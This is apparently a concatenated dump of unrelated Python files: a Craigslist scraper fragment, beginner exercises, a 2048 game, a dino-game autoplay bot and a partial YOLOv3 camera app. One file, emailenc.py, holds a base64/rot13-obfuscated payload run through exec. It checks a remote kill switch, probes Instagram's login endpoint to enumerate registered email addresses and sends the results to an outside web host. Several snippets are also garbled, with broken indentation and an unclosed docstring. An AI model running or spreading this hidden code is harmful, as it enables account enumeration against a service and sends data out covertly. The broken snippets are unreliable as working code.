"http://bn.craigslist.org/cas/index9300.html",
"http://bn.craigslist.org/cas/index9400.html",
"http://bn.craigslist.org/cas/index9500.html",
"http://bn.craigslist.org/cas/index9600.html",
"http://bn.craigslist.org/cas/index9700.html",
"http://bn.craigslist.org/cas/index9800.html",
"http://bn.craigslist.org/cas/index9900.html"
]
    # CrawlSpider reserves parse() for its own crawling logic, so the rule
    # callback uses a separate method name here.
    rules = (Rule(SgmlLinkExtractor(allow=(), restrict_xpaths=('//a')), callback="parse_item", follow=True),)

    def parse_item(self, response):
hxs = HtmlXPathSelector(response)
titles = hxs.select("//span[@class='pl']")
date_info = hxs.select("//h4[@class='ban']/span[@class='bantext']/text()")
items = []
file_to = open("things.txt","a")
file_to.write(response.body)
        for title in titles:
            item = CraigslistSampleItem()
            item["title"] = title.select("a/text()").extract()
            item["link"] = title.select("a/@href").extract()
            item["date"] = date_info.extract()
items.append(item)
return items
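# To run the spider from the Scrapy project root (output filename is illustrative):
#   scrapy crawl craigslist -o listings.json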
| [
"[email protected]"
] | |
cbefcfb03d52e7211ea14c7659e4667db51c9242 | 5b0cd5330bcb73faee8d55802f131a7e452b12c4 | /Exercise5_2_Tanit_S.py | 68c3699118abb08b3f6bc47984097f50240a4a0f | [] | no_license | sutirangt/CP3-Tanit-Suthirangkoon | 113b1f4877f6717918163b4bb09cab4b3ee99384 | 06afdf4dbd9a36ac8a7dfa00190c162cd6fa0c1f | refs/heads/main | 2023-01-01T19:39:41.064406 | 2020-10-19T09:44:27 | 2020-10-19T09:44:27 | 303,585,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | distance = int(input("Input Distance (km):"))
time = int(input("Input Time Used (hour):"))
print(int(distance/time),"km/h") | [
"[email protected]"
] | |
5fa3c9d9bb0d62ebb1c3fba841f5fde8baeb38ba | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /tDswMNY7X9h7tyTS4_22.py | cf345fc278bf3cb0fa4a9810e75fe0ead3c22a1a | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,116 | py | """
**Mubashir** was reading about [Pascal's
triangle](https://en.wikipedia.org/wiki/Pascal's_triangle) on Wikipedia.
In mathematics, Pascal's triangle is a triangular array of the binomial
coefficients that arises in probability theory, combinatorics, and algebra.

Formula for Pascal's triangle is given by:

where `n` denotes a row of the triangle, and `k` is the position of a term in
the row.
Create a function which takes a number `n` and returns **n top rows** of
Pascal's Triangle flattened into a one-dimensional list.
### Examples
pascals_triangle(1) ➞ [1]
pascals_triangle(2) ➞ [1, 1, 1]
pascals_triangle(4) ➞ [1, 1, 1, 1, 2, 1, 1, 3, 3, 1]
### Notes
N/A
"""
import math
def pascals_triangle(n):
triangle = []
for row in range(n):
new_row = []
for k in range(row+1):
new_row.append(math.factorial(row)//(math.factorial(k)*math.factorial(row-k)))
triangle += new_row
return triangle
| [
"[email protected]"
] | |
c0f17e5920d5998d79cec7577ec22356755f532d | a476eb25d5c9d0a209c615c96615d2e5bdccdf79 | /emailenc.py | 10c8c2b8e1ce0823f78effaebea95078811e60b8 | [] | no_license | danyarcode/Safeteam | 604bc7505c9ab560defaa091a20e80fa6ab1f484 | 2fb106bd81a72753be3837a3b4da3ddec44154f2 | refs/heads/main | 2023-06-09T20:20:29.950196 | 2021-07-09T06:02:09 | 2021-07-09T06:02:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,723 | py | import base64, codecs
magic = 'aW1wb3J0IHJlcXVlc3RzCmFjdGl2ZSA9IHJlcXVlc3RzLmdldCgnaHR0cHM6Ly90ZXh0dXBsb2FkZXIuY29tL3RzNzFiL3JhdycpLnRleHQKaWYgJ0FuaScgaW4gYWN0aXZlOgoJcGFzcwplbHNlOgoJcHJpbnQoIlNvcnJ5IFRoaXMgVG9vbCBJcyBOb3QgV29ya2luZyBOb3cgUGxlYXMgU2VuZCBNZWFzc2FnZSBGb3IgQGFuaS5jb2RlciAoOiIpCglleGl0KCkKaW1wb3J0IG9zLHJhbmRvbQppbXBvcnQgdGltZQp1cmxfaW5zdGE9J2h0dHBzOi8vd3d3Lmluc3RhZ3JhbS5jb20vYWNjb3VudHMvbG9naW4vYWpheC8nCmhlYWRfaW5zdGE9ewogICAgICAgICAgICAnYXV0aG9yaXR5JzogJ3d3dy5pbnN0YWdyYW0uY29tJywKICAgICAgICAgICAgJ21ldGhvZCc6ICdQT1NUJywKICAgICAgICAgICAgJ3BhdGgnOiAnL2FjY291bnRzL2xvZ2luL2FqYXgvJywKICAgICAgICAgICAgJ3NjaGVtZSc6ICdodHRwcycsCiAgICAgICAgICAgICdhY2NlcHQnOiAnKi8qJywKICAgICAgICAgICAgJ2FjY2VwdC1lbmNvZGluZyc6ICdnemlwLCBkZWZsYXRlLCBicicsCiAgICAgICAgICAgICdhY2NlcHQtbGFuZ3VhZ2UnOiAnZW4tVVMsZW47cT0wLjksYXI7cT0wLjgsZW4tR0I7cT0wLjcnLAogICAgICAgICAgICAnY29udGVudC1sZW5ndGgnOiAnMjc3JywKICAgICAgICAgICAgJ2NvbnRlbnQtdHlwZSc6ICdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnLAogICAgICAgICAgICdjb29raWUnOiAnaWdfZGlkPUQ5QUQ1NUZGLUQ0MEYtNDU2OS04RjNELTcyOTIzRDZCNDk2RDsgbWlkPVgtb01Yd0FFQUFGc0dQLVZCX0tydlROanFwTVY7IGlnX25yY2I9MTsgZGF0cj1sYnp0WC1Rd0FUOXVNNnV6TERXemJnb2Y7IGZibV8xMjQwMjQ1NzQyODc0MTQ9YmFzZV9kb21haW49Lmluc3RhZ3JhbS5jb207IGRzX3VzZXJfaWQ9NDUyNDY3MjUzODU7IGNzcmZ0b2tlbj11MjdsMnNrWHhYUzNzbU55WWg3YllRN0daZUMzOXpxNScsCiAgICAgICAgICAgJ29yaWdp'
love = 'ovp6VPqbqUEjpmbiY3q3ql5coaA0LJqlLJ0hL29gWljXVPNtVPNtVPNtVPNapzIzMKWypvp6VPqbqUEjpmbiY3q3ql5coaA0LJqlLJ0hL29gY2SwL291oaEmY2kiM2yhYlpfPvNtVPNtVPNtVPNtW3AyLl1zMKEwnP1xMKA0WmbtW2IgpUE5WljXVPNtVPNtVPNtVPNap2IwYJMyqTAbYJ1iMTHaBvNaL29lplpfPvNtVPNtVPNtVPNtW3AyLl1zMKEwnP1mnKEyWmbtW3AuoJHgo3WcM2yhWljXVPNtVPNtVPNtVPNaqKAypv1uM2IhqPp6VPqAo3ccoTkuYmHhZPNbI2yhMT93plOBIPN2YwZ7VSqcowL0BlO4AwDcVRSjpTkyI2IvF2y0YmHmAl4mAvNbF0uHGHjfVTkcn2HtE2Iwn28cVRAbpz9gMF84BP4jYwDmZwDhZGN0VSAuMzSlnF81ZmphZmLaYNbtVPNtVPNtVPNtVPq4YJAmpzM0o2gyovp6VPq1ZwqfZaAeJUuLHmAmoH55JJt3LyyEA0qnMHZmBKckAFpfPvNtVPNtVPNtVPNtW3tgnJpgLKOjYJyxWmbtWmxmAwLkBGp0ZmZ5ZwD1BFpfPvNtVPNtVPNtVPNtW3tgnJpgq3q3YJAfLJygWmbtWmNaYNbtVPNtVPNtVPNtVPq4YJyhp3EuM3WuoF1unzS4WmbtWmquZ2RmMGL0MzR4AlpfPvNtVPNtVPNtVPNtW3tgpzIkqJImqTIxYKqcqTtaBvNaJR1ZFUE0pSWypKIyp3DaPa0XoT9aolN9VPpaWjbtK19sVPNtVPOsK19sVPOsK19sVPNtK18tK18tVPOsK19sVPOsK19sVPNXsPNtVSjtVPNiVPNtVSE8VPNtVSjtsPNtIPNtIPNiVPNtVSE8VPNtVSjtPajtVPNtKPOMVPOiVPO8sPNtKlNtJKjtVUjtVUkMVPOiVPO8sPNtEPNtXDc8VPORVPOMsPNtVPNtsUjtVUjtVUk8VPO+VPO8sPNtVPNtsUjtVPNtYlNXsPNtVPNtsUjtVS8tVUk8VPO8VPO8oS9sKljtsUjtVS8tVUk8VPNtVSjtPajtVPNtVUk8VPO8VPO8sPNtsPNtsUjtVPNtVPS8VPO8VPO8sPNtYvNtJDcfK19sK19doS9sny9snzksK2csK2cfK19sKl8toS9sny9snzksK2cpK2bXGKxtFJ5mqTSapzSgVQbtMQEhrGElptbXYF0gYF0gYF0gYF0gYF0gYF0gYF0gYF0gYF0gYF0gYF0gPvNtVPNtVPNtVPNtVPNtVPNt'
god = 'ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnJycKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKZGVmIGVtYWlsKCk6Cglvcy5zeXN0ZW0oImNsZWFyIikKCWZpbGVyID0gb3BlbigiZW1haWwudHh0IiwidyIpCglwcmludChsb2dvKQoJbmFtZV9yYW5kb209aW5wdXQoIk5hbWUgUmFuZG9tIDoiKQoJZm9yIHggaW4gcmFuZ2UoMTUwKToKCQlmID0gJzEyMzQ1Njc4OTAnCgkJeDEgPSByYW5kb20uY2hvaWNlKGYpCgkJeDEyID0gcmFuZG9tLmNob2ljZShmKQoJCXgxMjMgPSByYW5kb20uY2hvaWNlKGYpCgkJeDEyMzQgPSByYW5kb20uY2hvaWNlKGYpCgkJYWxsID0gbmFtZV9yYW5kb20reDEreDEyK3gxMjMreDEyMzQrJ0B5YWhvby5jb20nCgkJdGltZWUgPSBhbGwrIlxuIgoJCWZpbGVyLndyaXRlKHRpbWVlKQoJdGltZS5zbGVlcCgzKQoJcHJpbnQoIlxuXG4iKQoJcHJpbnQoIk5PVyBZT1UgSEFWRSBFTUFJTCBKVVNUIEdJVkUgTUUgVElNRSAoOiIpCgl0aW1lLnNsZWVwKDQpCiNFTUFJTCBUQVdBVyBCVyBTQVJBWSBDSEVDS0VSIGluc3RheWEgCiNlbWFpbCgpCmRlZiBpbnN0YWdyYW0oKToKCXVzZT0wCglub3R1c2U9MAoJb3Muc3lzdGVtKCJjbGVhciIpCglwcmludChsb2dvKQoJZmlsZXIgPSBvcGVuKCJlbWFpbGluc3RhLnR4dCIsInciKQoJZmlsdGVyID0gb3BlbigiZW1haWwudHh0IiwiciIpLnJlYWRsaW5lcygpCglmb3IgeiBpbiBmaWx0ZXI6CgkJenogPSB6LnN0cmlwKCkKCQlnbG9iYWwgdXJsX2luc3RhCgkJZ2xvYmFsIGhlYWRfaW5zdGEKCQlkYXRhID0gewogICAgJ3VzZXJuYW1lJzogenosCiAgICAnZW5jX3Bhc3N3b3JkJzogJyNQV0RfSU5TVEFHUkFNX0JST1dTRVI6MDoxNjEzMjEyNzI1OnNqcycsCiAgICAncXVlcnlQYXJhbXMnOiAne30nLAogICAgJ29wdEludG9PbmVUYXAnOiAnZmFsc2UnCgkJfQoJCXJlc3QgPSByZXF1'
destiny = 'MKA0pl5jo3A0XUIloS9coaA0LFkbMJSxMKWmCJuyLJEsnJ5mqTRfMTS0LG1xLKEuXF50MKu0PtxWV3OlnJ50XUWyp3DcPtxWnJLtWlW1p2IlVwc0paIyWlOcovOlMKA0BtbWPDyipl5mrKA0MJ0bVzAfMJSlVvxXPDxWpUWcoaDboT9aolxXPDxWqKAyXm0kPtxWPKOlnJ50XPWSGHSWGPOZFH5YEHDtFH5GIRSUHxSAVQbtr30vYzMipz1uqPu1p2HcXDbWPDyjpzyhqPtvGx9HVRkWGxgSEPN6VUg9Vv5zo3WgLKDboz90qKAyXFxXPDxWMzyfMKVhq3WcqTHbrabeVykhVvxXPDxWp2IhMS90MKu0VQ0tW2u0qUOmBv8iLKOcYaEyoTIapzSgYz9lMl9vo3DkAwNlZwtlZQLjBxSOEGyXEQEvA3cTFUc4GTgJJII6oTykH1IUox9xFR1jAQEAY3AyozEAMKAmLJqyC2AbLKEsnJD9ZGLkAGZ0Amt1ZvMjLKWmMI9go2EyCH1upzgxo3qhWaEyrUD9Wlg6rtbWPDybq2xtCFOlMKS1MKA0pl5aMKDbp2IhMS90MKu0XDbWPJIfp2H6PtxWPDbWPDyipl5mrKA0MJ0bVzAfMJSlVvxXPDxWpUWcoaDboT9aolxXPDxWoz90qKAyXm0kPtxWPKOlnJ50XPWSGHSWGPOZFH5YEHDtFH5GIRSUHxSAVQbtr30vYzMipz1uqPu1p2HcXDbWPDyjpzyhqPtvGx9HVRkWGxgSEPN6VUg9Vv5zo3WgLKDboz90qKAyXFxXPDxXPDxXPDxXV2yhp3EuM3WuoFtcPtxWPzEyMvOwMJ1unJjbXGbXPDyipl5mrKA0MJ0bVzAfMJSlVvxXPDyjpzyhqPufo2qiXDbWPJMcoUEypvN9VT9jMJ4bVzIgLJyfnJ5mqTRhqUu0VvjvpvVcYaWyLJEfnJ5ypltcPtxWMz9lVUu4VTyhVTMcoUEypwbXPDxWqTygMF5moTIypPt4XDbWPDy4VQ14rP5mqUWcpPtcPtxWPKIloPN9VPqbqUEjpmbiY2EuozqypaA5qJ15qJ0hZQNjq2IvnT9mqTSjpP5wo20iLKOcYaObpQ9yoJScoQ0aX3tXPDxWpzImpT9hMFN9VUWypKIyp3EmYzqyqPu1pzjcPtxWPJyzVPqRFHHaVTyhVUWyp3OiozHhqTI4qQbXPDxWPKOlnJ50XPWSGHSWGPN6VPVerPxXPDxWMJkmMGbXPDxWPKOup3ZXPDxWPzIgLJyfXPxXnJ5mqTSapzSgXPxXPtxWPtxWPt=='
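# The remaining lines decode 'rot13' from hex escapes, reassemble the base64
# payload (rot13-decoding the 'love' and 'destiny' pieces), then exec it.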
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec')) | [
"[email protected]"
] | |
099766ad78e6c05c6b43501d208f8861cf94d568 | 9216ec6fc0044a730f1fac563d73c2bfaf97e518 | /2048.py | 96e3a977505373bb955978fdaa517301115535e9 | [] | no_license | Starship87/2048-game | 92ce37dfce7c18ffa1578ae0a3fb59a9e98e0a10 | ade141ac093448d0192960a5f37ae236bd4c33ca | refs/heads/master | 2020-09-24T11:40:58.473695 | 2020-01-29T01:02:48 | 2020-01-29T01:02:48 | 225,752,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | #2048 game
import random
import time
score = 0
highscore = 0
board =[]
def newgame():
global board
#fill board
board = []
row = []
for i in range(4):
row.append(0)
for j in range(4):
board.append(row.copy())
def showboard():
for i in range(4):
row = ""
for j in range (4):
row = row + str(board[i][j]) + " "
print(row)
def newnumber():
newnum = 0
newrow = random.randint(0,3)
newcol = random.randint(0,3)
while board[newrow][newcol] != 0:
newrow = random.randint(0,3)
newcol = random.randint(0,3)
    rand = random.randint(1, 100)
    if rand < 80:  # roughly an 80% chance of a 2, otherwise a 4
        newnum = 2
    else:
        newnum = 4
    board[newrow][newcol] = newnum  # write the new tile onto the chosen empty cell
newgame()
newnumber()  # a standard 2048 board starts with two tiles
newnumber()
showboard()
| [
"[email protected]"
] | |
9da9cea9f0b10697611fe8b65be747c62a209e15 | eaccc86687e5d3ea409c41759e9daf25e976fcb6 | /GDinoBot.py | 5a6fd8ae2e77f531e031313d1addfb06ea2bd44b | [] | no_license | LucidMach/GDinoBot | 188d27613cf21d1e5446b93072290ad09f5c9b6e | fd4f089475b99974ba05e93319967e950e6300ed | refs/heads/master | 2022-08-17T05:21:57.323840 | 2020-05-24T20:15:58 | 2020-05-24T20:15:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | import pyautogui as pg, time
white = (255, 255, 255)
pg.hotkey("win","2")
time.sleep(1)
pg.typewrite("a")
pg.hotkey("enter")
time.sleep(1)
pg.hotkey("space ")
while True:
while pg.pixel(x=900, y=750) == white:
if pg.pixel(x=679, y=333) != white:
pg.hotkey("space")
elif pg.pixel(x=679, y=333) == white and pg.pixel(x=679, y=305) != white:
pg.keyDown("down")
time.sleep(0.75)
pg.keyUp("down")
while pg.pixel(x=900, y=750) != white:
if pg.pixel(x=679, y=333) == white:
pg.hotkey("space")
elif pg.pixel(x=679, y=333) != white and pg.pixel(x=679, y=305) == white:
pg.keyDown("down")
time.sleep(0.75)
pg.keyUp("down")
| [
"[email protected]"
] | |
8d7fb22a6c6756d44fe42a19ac950cc877acbe97 | aadf51507e9a664729ea42d38e62cd6a08da0f06 | /change.py | c3a407c2c6f913115059195abbfe9277cc5a754c | [] | no_license | tanjinarahm/algorithms2 | 29b2dcbe0b59d0a84aa95b96fe7e49a26f85432e | 61b8022ddf0b78a799a2e88f63fb845925ec127f | refs/heads/master | 2022-04-23T07:29:50.300892 | 2020-04-28T02:08:45 | 2020-04-28T02:08:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | def change(num):
change = {"q": 0, "d": 0, "n": 0, "p": 0}
if num >= 25:
change["q"] = int(num/25)
num %= 25
if num >= 10:
change["d"] = int(num/10)
num %= 10
if num >= 5:
change["n"] = int(num/5)
num %= 5
if num >= 1:
change["p"] = int(num/1)
num %= 1
return change
print(change(94))  # {'q': 3, 'd': 1, 'n': 1, 'p': 4}
def change2(num):
change = {"q": 0, "d": 0, "n": 0, "p": 0}
while (num > 0):
if num >= 25:
change["q"] += 1
num -= 25
elif num >= 10:
change["d"] += 1
num -= 10
elif num >= 5:
change["n"] += 1
num -= 5
else:
change["p"] += 1
num -= 1
return change
print(change2(94))
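# Worked example: 94 cents -> 3 quarters (75), 1 dime (85), 1 nickel (90),
# 4 pennies (94); both versions return {'q': 3, 'd': 1, 'n': 1, 'p': 4}.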
| [
"[email protected]"
] | |
7d58d170ccd59d2b30f04e9210067ffec1c01f94 | d4f76aa484cbf1f6026b0c102e5d70012a28512a | /msos_project/dsp_tools/spectral_contrast_feature_max_classifier.py | e8c4ff4004c4f9e5ebfe3c18654201b6ca4a19de | [] | no_license | hbulg96/MSOS-classifier | 4eaea8b434455fc300b25fcd0c6bde52b32e7d23 | aa5b9702f7f39a30ea9b9746244c82fa75b2bbea | refs/heads/main | 2023-05-05T05:19:19.374327 | 2021-05-25T16:39:59 | 2021-05-25T16:39:59 | 370,755,497 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,046 | py | import numpy
import matplotlib
from matplotlib import pyplot
import scipy
from scipy import signal
from scipy.io.wavfile import read
from scipy.io.wavfile import write
import os
import timeit
import traceback
import msos_project
from msos_project import *
from msos_project.dsp_tools import *
import msos_project.dsp_tools.peakdetection as peakdetection
import msos_project.dsp_tools.peakflatten as peakflatten
import msos_project.dsp_tools.rhythmdetection as rhythmdetection
import msos_project.dsp_tools.find_similar_magnitude_peaks as find_similar_magnitude_peaks
import msos_project.dsp_tools.find_rhythmic_packets as find_rhythmic_packets
from numpy import random
import msos_project.classification_1_rhythm_time_domain_v0_standalone as classifier1
import msos_project.dsp_tools.spectral_centroid_classifier as spectral_centroid_classifier
import msos_project.dsp_tools.spectral_centroid_assign_weights as spectral_centroid_assign_weights
import msos_project.dsp_tools.zero_crossing_rate_classifier as zero_crossing_rate_classifier
import msos_project.dsp_tools.rms_variation_classifier as rms_variation_classifier
from scipy import stats
from numpy import polyfit
import librosa
from librosa import *
from librosa import display
import scipy.stats
def spectral_contrast_feature_max_classifier(input_path, show_graph=False):
input_file = read(input_path) # read wav file
fs = input_file[0]
input_file = numpy.array(input_file[1], dtype = float) # interpret file as numpy array
print("Fs = ", fs)
feature_1 = librosa.feature.spectral_contrast(input_file, n_bands=8, fmin=100, sr=fs)
feature_2 = librosa.feature.spectral_contrast(input_file, n_bands=8, fmin=100, sr=fs)
number_of_bands = feature_1.shape[0]
length_of_contrast_values = feature_1.shape[1]
# find most tonal or most noisy band
band_averages = [] #store average spectral contrast value per band
for freq_band in range(number_of_bands):
current_band = feature_1[freq_band]
band_average = sum(current_band)/len(current_band)
band_averages.append(band_average)
for contrast_value in range(len(current_band)):
current_value = current_band[contrast_value]
pass
pass
max_contrast_band = max(band_averages)
max_contrast_band_index = band_averages.index(max_contrast_band)
min_contrast_band = min(band_averages)
min_contrast_band_index = band_averages.index(min_contrast_band)
#print("band_averages = ", band_averages)
#print("largest average contrast band value = ", max_contrast_band)
#print("max contrast band index = ", max_contrast_band_index)
#print("smallest average contrast band value = ", min_contrast_band)
#print("minx contrast band index = ", min_contrast_band_index)
# most important band (feature band)
feature_band_index = max_contrast_band_index
feature_band = feature_1[feature_band_index] # contrast band with the highest average contrast value,
# representing the most interesting/intentional sound?
# "least" important band (noise band)
noise_band_index = min_contrast_band_index
noise_band = feature_1[noise_band_index]
# amount of time spent with max contrast in feature band (should be closest to feature band)
time_spent_at_feature_band = 0
time_spent_at_noise_band = 0
max_contrast_all_bands = [] # location of the max spectral contrast at any time
for value_index in range(length_of_contrast_values):
# find index of current spectral contrast value
contrast_values_per_band = []
for freq_band in range(number_of_bands):
# find max value in all bands
current_band = feature_1[freq_band]
#print("freq band index = ", freq_band)
#print("spectral contrast values = ", current_band)
contrast_values_per_band.append(current_band[value_index])
pass
max_contrast_value_band = max(contrast_values_per_band)
mcvb_index = contrast_values_per_band.index(max_contrast_value_band)
max_contrast_all_bands.append(mcvb_index)
min_contrast_value_band = min(contrast_values_per_band)
mincvb_index = contrast_values_per_band.index(min_contrast_value_band)
if mcvb_index == feature_band_index:
time_spent_at_feature_band += 1
pass
else:
pass
if mincvb_index == noise_band_index:
time_spent_at_noise_band += 1
pass
else:
pass
feature_1 = time_spent_at_noise_band # Average of spectral contrast in all bands condensed into one value
feature_2 = time_spent_at_feature_band # amount of time ticks spent with max spentral contrast in the feature band
if show_graph == True:
print("Noise-min metric = ", feature_1)
print("Feature-max metric = ", feature_2)
pyplot.figure(1)
contrast_bands = librosa.feature.spectral_contrast(input_file, n_bands=8, fmin=100, sr=fs)
pyplot.imshow(contrast_bands, aspect='auto', origin="lower", cmap="coolwarm")
pyplot.ylabel('Frequency Band')
pyplot.xlabel('Time (DFT bin)')
pyplot.title("Spectral Contrast")
# add lines for feature band and noise band
contrast_bands = librosa.feature.spectral_contrast(input_file, n_bands=8, fmin=100, sr=fs)
feature_band_x_points = [0, (contrast_bands.shape[1] - 1)]
feature_band_y_points = [feature_band_index, feature_band_index]
pyplot.plot(feature_band_x_points, feature_band_y_points, color='r',linewidth=3, label='feature band')
noise_band_x_points = [0, (contrast_bands.shape[1] - 1)]
noise_band_y_points = [noise_band_index, noise_band_index]
pyplot.plot(noise_band_x_points, noise_band_y_points, color='b', linewidth=3, label='noise band')
pyplot.plot(range(len(max_contrast_all_bands)), max_contrast_all_bands, color='g', label='max spectral contrast value')
pyplot.legend()
pyplot.show()
pass
elif show_graph == False:
pass
else:
print("Error in detecting show_graph variable")
pass
return(feature_1, feature_2)
"""
test_file = read(r"C:\\Users\h_bul\Documents\Acoustics Year 3\Project\Audio Resources\Development\Effects\0M8.wav")
test_file = numpy.array(test_file[1], dtype = int)
matplotlib.pyplot.plot(test_file)
pyplot.xlabel("Time")
pyplot.ylabel("Amplitude")
pyplot.show()
"""
"""
matplotlib.pyplot.plot(gain_boosted_file)
pyplot.xlabel("Time")
pyplot.ylabel("Amplitude")
pyplot.show()
"""
"""
f, t, Sxx = signal.spectrogram(average_effect_file, 44100)
pyplot.pcolormesh(t, f, Sxx, shading='gouraud')
pyplot.ylabel('Frequency [Hz]')
pyplot.xlabel('Time [sec]')
pyplot.show()
"""
| [
"[email protected]"
] | |
6bc1c39d0bfd966c86046b9b2b34af90fc49a7b8 | f24c8aa0a55709eb660026f2c94c284b314d471e | /app.py | 461a6d4414e7997877b6daf8c7babc3d82ee91af | [
"BSD-3-Clause"
] | permissive | ocanava/number_guessing_game | 72ee44ecf3169c6c00a05150bc651fd8deb27ba3 | f0ca634301ee0f24fd39b05d6196ac7b490fb00a | refs/heads/master | 2022-12-13T11:54:33.841804 | 2020-08-31T15:43:41 | 2020-08-31T15:43:41 | 278,231,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,401 | py | """
Python Web Development Techdegree
Project 1 - Number Guessing Game
--------------------------------
import random
number = random.randint(1, 10)
def start_game():
print("Welcome to the Number Guessing Game!!")
input("Press ENTER to continue...")
Tries = 1
while True:
try:
number = int(input("Pick a number between 1 and 10: "))
number = int(number)
guess_value = 3
except ValueError:
print("Oops! Please enter a valid number.")
Tries = Tries + 1
else:
if guess_value > number:
print("It's Higher! ")
Tries = Tries + 1
continue
elif guess_value < number:
print("It's Lower! ")
Tries = Tries + 1
continue
elif guess_value == number:
Tries = str(Tries)
print("Well done! You guessed it in", Tries + " tries. Game has ended! See you next time! ")
break
start_game()
| [
"[email protected]"
] | |
5ff88ef18493eedc1ff2c03369b53bedee882b04 | 0f297fb93f82b55c83817479af2e00bb737dcc93 | /实习小车启动代码/111/merg.py | f44ff12c93da1cff11d9a96f42d51c2890771ce5 | [] | no_license | yejiasheng/raspberry | 55c3dabf13fcff6dfeaddecbc72e2cf8968daaa3 | 27e1a95197a10583ce205bf40c04bcc8b76b2dc7 | refs/heads/main | 2023-07-25T02:57:38.875487 | 2021-09-07T01:45:36 | 2021-09-07T01:45:36 | 403,806,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,776 | py | from flask import Flask, render_template, Response
import sys
sys.path.append("/home/lzk/samples/common")
sys.path.append("../")
import os
import numpy as np
import acl
import time
import socket
import cv2
import traceback
from PIL import Image, ImageDraw, ImageFont
import atlas_utils.constants as const
from atlas_utils.acl_model import Model
from atlas_utils.acl_resource import AclResource
import atlas_utils.utils as utils
from atlas_utils.acl_dvpp import Dvpp
from atlas_utils.acl_image import AclImage
app = Flask(__name__)
camera = cv2.VideoCapture('rtsp://192.168.10.24/test') # use 0 for web camera
# for cctv camera use rtsp://username:password@ip_address:554/user=username_password='password'_channel=channel_number_stream=0.sdp' instead of camera
# for local webcam use cv2.VideoCapture(0)
labels =["hand"]
MODEL_PATH = "/home/YJS/model/yolov3_me.om"
MODEL_WIDTH = 416
MODEL_HEIGHT = 416
class_num = 3
stride_list = [32, 16, 8]
anchors_3 = np.array([[12, 16], [19, 36], [40, 28]]) / stride_list[2]
anchors_2 = np.array([[36, 75], [76, 55], [72, 146]]) / stride_list[1]
anchors_1 = np.array([[142, 110], [192, 243], [459, 401]]) / stride_list[0]
anchor_list = [anchors_1, anchors_2, anchors_3]
conf_threshold = 0.8
iou_threshold = 0.3
colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 255, 255), (255, 0, 255), (255, 255, 0)]
# Initialization
acl_resource = AclResource()
acl_resource.init()
model = Model("/home/YJS/model/yolov3_me.om")
def preprocess(image): # expects a BGR OpenCV frame
image = Image.fromarray(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))
img_h = image.size[1] #360
img_w = image.size[0] #640
net_h = MODEL_HEIGHT #416
net_w = MODEL_WIDTH #416
scale = min(float(net_w) / float(img_w), float(net_h) / float(img_h)) #416/640
new_w = int(img_w * scale) #416
new_h = int(img_h * scale) #234
#delta = (MODEL_HEIGHT - int(image.size[1] * scale)) // 2
shift_x = (net_w - new_w) // 2 #0
shift_y = (net_h - new_h) // 2 #91
shift_x_ratio = (net_w - new_w) / 2.0 / net_w #0
shift_y_ratio = (net_h - new_h) / 2.0 / net_h #0.21875
image_ = image.resize((new_w, new_h))
new_image = np.zeros((net_h, net_w, 3), np.uint8)
new_image[shift_y: new_h + shift_y, shift_x: new_w + shift_x, :] = np.array(image_)
new_image = new_image.astype(np.float32)
new_image = new_image / 255
#print('new_image.shape', new_image.shape)
new_image = new_image.transpose(2, 0, 1).copy()
return new_image, image
def overlap(x1, x2, x3, x4):
left = max(x1, x3)
right = min(x2, x4)
return right - left
def cal_iou(box, truth):
w = overlap(box[0], box[2], truth[0], truth[2])
h = overlap(box[1], box[3], truth[1], truth[3])
if w <= 0 or h <= 0:
return 0
inter_area = w * h
union_area = (box[2] - box[0]) * (box[3] - box[1]) + (truth[2] - truth[0]) * (truth[3] - truth[1]) - inter_area
return inter_area * 1.0 / union_area
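# e.g. cal_iou([0, 0, 1, 1], [0.5, 0, 1.5, 1]): intersection 0.5, union 1.5,
# giving an IoU of 1/3.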
def apply_nms(all_boxes, thres):
res = []
for cls in range(class_num):
cls_bboxes = all_boxes[cls]
sorted_boxes = sorted(cls_bboxes, key=lambda d: d[5])[::-1]
p = dict()
for i in range(len(sorted_boxes)):
if i in p:
continue
truth = sorted_boxes[i]
for j in range(i + 1, len(sorted_boxes)):
if j in p:
continue
box = sorted_boxes[j]
iou = cal_iou(box, truth)
if iou >= thres:
p[j] = 1
for i in range(len(sorted_boxes)):
if i not in p:
res.append(sorted_boxes[i])
return res
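# apply_nms keeps the highest-scoring box per class and suppresses any other
# box whose IoU with an already-kept box is at least thres.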
def _sigmoid(x):
return 1.0 / (1 + np.exp(-x))
def decode_bbox(conv_output, anchors, img_w, img_h, x_scale, y_scale, shift_x_ratio, shift_y_ratio):
print('conv_output.shape', conv_output.shape)
_, _, h, w = conv_output.shape
conv_output = conv_output.transpose(0, 2, 3, 1)
pred = conv_output.reshape((h * w, 3, 5 + class_num))
pred[..., 4:] = _sigmoid(pred[..., 4:])
